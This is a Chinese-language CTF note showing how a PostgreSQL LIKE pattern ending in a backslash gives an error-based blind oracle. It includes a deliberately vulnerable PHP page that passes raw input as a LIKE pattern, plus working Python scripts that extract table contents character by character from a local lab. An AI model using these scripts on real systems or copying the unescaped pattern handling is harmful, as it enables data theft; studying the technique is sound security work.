笔记

postgre的like有个特性,不好解释直接上例子

1
SELECT * FROM "public"."testtable" WHERE name like 'fl%\'

当like字符串结尾有\的时候,如果前面的字符串能在数据库里匹配到内容(且被匹配的字符串还有剩余)就会报错ERROR: LIKE pattern must not end with escape character,如果没匹配到就不报错(猜测是因为匹配没执行到\,所以不报错)

例如这么一个数据库

id name code pass
1 flag{123qwwe} qwe asd
2 adssac zxc bdvds

执行SELECT * FROM "public"."testtable" WHERE name like 'fl%\',数据库里匹配到了fl%,此时就会报错

image-20251230110408764

执行SELECT * FROM "public"."testtable" WHERE name like 'fls%\',数据库里匹配不到fls%,就不报错,返回空结果

image-20251230110420972

如果匹配到结尾SELECT * FROM "public"."testtable" WHERE name like 'fl%}\',被匹配的字符串已经结束了,也不报错

image-20251230112238833

利用这个特性就可以整个盲注,只返回查询成功不成功,一位一位的爆flag,还是用上面的数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php

// 获取用户输入(例如通过 POST 请求)
$userInput = $_POST['name'] ?? '';

// 数据库连接参数(请根据实际情况修改)
$host = 'localhost';
$port = 15432;
$dbname = 'postgres';
$user = 'postgres';
$password = 'mysecretpassword';

try {
    // 创建 PDO 连接
    $dsn = "pgsql:host=$host;port=$port;dbname=$dbname;";
    $pdo = new PDO($dsn, $user, $password, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC
    ]);

    // 构建 LIKE 模式(注意:用户输入中可能包含 % 或 _,如需转义可进一步处理)
    $likePattern = $userInput;

    // 准备 SQL 语句
    $sql = 'SELECT * FROM public.testtable WHERE name LIKE :pattern';
    $stmt = $pdo->prepare($sql);

    // 绑定参数并执行
    $stmt->bindValue(':pattern', $likePattern, PDO::PARAM_STR);
    $stmt->execute();

    // 查询成功(即使没有匹配行也算成功)
    echo "查询成功";

} catch (PDOException $e) {
    // 查询失败
    error_log("PostgreSQL 查询错误: " . $e->getMessage());
    echo "查询失败";
}

构造盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests
import string
letters = string.ascii_letters+string.digits+"-{}"
flag="flag{"
while True:
    for i in letters:
        payload=f"{flag}{i}%\\"
        resp=requests.post('http://127.0.0.1/index.php',data={"name":payload})
        if '失败' in resp.text:
            flag+=i
            print(flag)
            break
    else:
        print(flag)
        break

运行只能注到flag{123qwwe,因为最后一步执行的是SELECT * FROM public.testtable WHERE name LIKE 'flag{123qwwe}%\',被匹配的字符串已经结束了,所以也不会报错,判断不出来最后一位字符。但是flag的最后一位一般都是},自己补上就完了

上面那个脚本只能注一个,如果数据库里有多行数据就不行了,下面这个可以把数据库里所有行都注出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests
import string
letters = string.ascii_letters+string.digits+"-{}"
def blind(flag):
    x=True
    for i in letters:
        payload=f"{flag}{i}%\\"
        resp=requests.post('http://127.0.0.1/index.php',data={"name":payload})
        if '失败' in resp.text:
            print(flag+i)
            x = False
            blind(flag+i)
    if x:
        print("flag:"+flag)
blind("")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
a
ad
ads
adss
adssa
flag:adssa
f
fl
fla
flag
flag{
flag{1
flag{12
flag{123
flag{123q
flag{123qw
flag{123qww
flag{123qwwe
flag:flag{123qwwe

当然有些情况比如数据库里一条是adssac另一条是adssacs这种情况由于前缀一样,短的注一半停了会漏掉长的,但是出题数据库里flag一般是唯一的,不会有相同的前缀。能判断出来flag是哪个就行。